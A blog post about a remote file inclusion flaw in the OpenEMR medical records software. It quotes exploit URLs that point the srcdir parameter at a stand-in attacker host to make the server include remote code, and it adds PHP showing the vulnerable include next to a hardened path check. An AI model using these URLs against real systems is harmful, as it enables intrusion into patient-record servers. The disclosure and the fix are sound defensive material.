An Indonesian hacker named Dedi Dwianto has just publicized a vulnerability in OpenEMR. This is a significant milestone for the project: it means that OpenEMR is popular enough for a security researcher to take notice. Open Source has the potential to be more secure, but only if security researchers look for flaws and the projects then respond by fixing the code. (I wish I had hackers studying my code…) I am sure that the OpenEMR folks will be releasing a patch soon. If you are an OpenEMR user, you should upgrade to the soon-to-be-released version ASAP. Read more for a description of the vulnerability…
Apparently there are several places in OpenEMR where an unchecked GET parameter is passed in. OpenEMR expects the value to be a path on the local filesystem, but you can pass in a URL instead, with unexpected results. From the exploit…
http://target.com/[OpenEMR-path]/interface/billing/billing_process.php?srcdir=http://atacker.com/inject.txt?
http://target.com/[OpenEMR-path]/interface/new/new_patient_save.php?srcdir=http://atacker.com/inject.txt?
http://target.com/[OpenEMR-path]/login.php?srcdir=http://atacker.com/inject.txt?
http://target.com/[OpenEMR-path]/library/translation.inc.php?GLOBALS[srcdir]=http://atacker.com/inject.txt?
The security researcher suggests turning off register_globals and checking for sanity in srcdir, but as I recall, OpenEMR does not use register_globals. We will have to wait for comment/patch from OpenEMR to see what the fix is.
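To make the "sanity check on srcdir" concrete, here is an added illustration (not OpenEMR's code, and not the patch the project will ship) of the unchecked pattern beside a hardened version. The function names, the allowed base directory, and the constructed test inputs are assumptions of the example.

```php
<?php
// Added illustration, not OpenEMR's own code. Shows the class of bug described
// above and one way to sanity-check a directory parameter before using it.

// Vulnerable pattern: a GET parameter that is expected to name a local
// directory is used directly in an include, so a URL or a ../ sequence
// supplied by the client is honoured.
function include_from_request_unsafe(): void {
    $srcdir = $_GET['srcdir'];        // client-controlled
    include $srcdir . '/sql.inc';     // remote or arbitrary local file
}

// Hardened: resolve the candidate to a canonical path and accept it only if
// it is a directory inside a fixed allowed base; otherwise use the default.
function resolve_srcdir(string $candidate, string $allowedBase, string $default): string {
    // A local directory never carries a URL scheme or a NUL byte.
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $candidate) || strpos($candidate, "\0") !== false) {
        return $default;
    }
    $real = realpath($candidate);
    $base = realpath($allowedBase);
    if ($real === false || $base === false || !is_dir($real)) {
        return $default;
    }
    // Prefix test on canonical paths defeats ../ traversal and symlink tricks.
    if ($real !== $base && strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return $default;
    }
    return $real;
}

// Self-check with constructed inputs in a throwaway temporary directory.
$base = realpath(sys_get_temp_dir()) . '/srcdir_demo_' . getmypid();
mkdir($base . '/library', 0700, true);
$default = $base . '/library';

$cases = [                                     // constructed inputs
    'http://attacker.example/inject.txt?' => $default,          // URL rejected
    '../../etc'                          => $default,          // traversal rejected
    $base . '/library'                   => $base . '/library', // local dir accepted
];
foreach ($cases as $in => $want) {
    $got = resolve_srcdir($in, $base, $default);
    printf("%-40s -> %s\n", $in, $got === $want ? 'OK' : "UNEXPECTED ($got)");
}
rmdir($base . '/library');
rmdir($base);
```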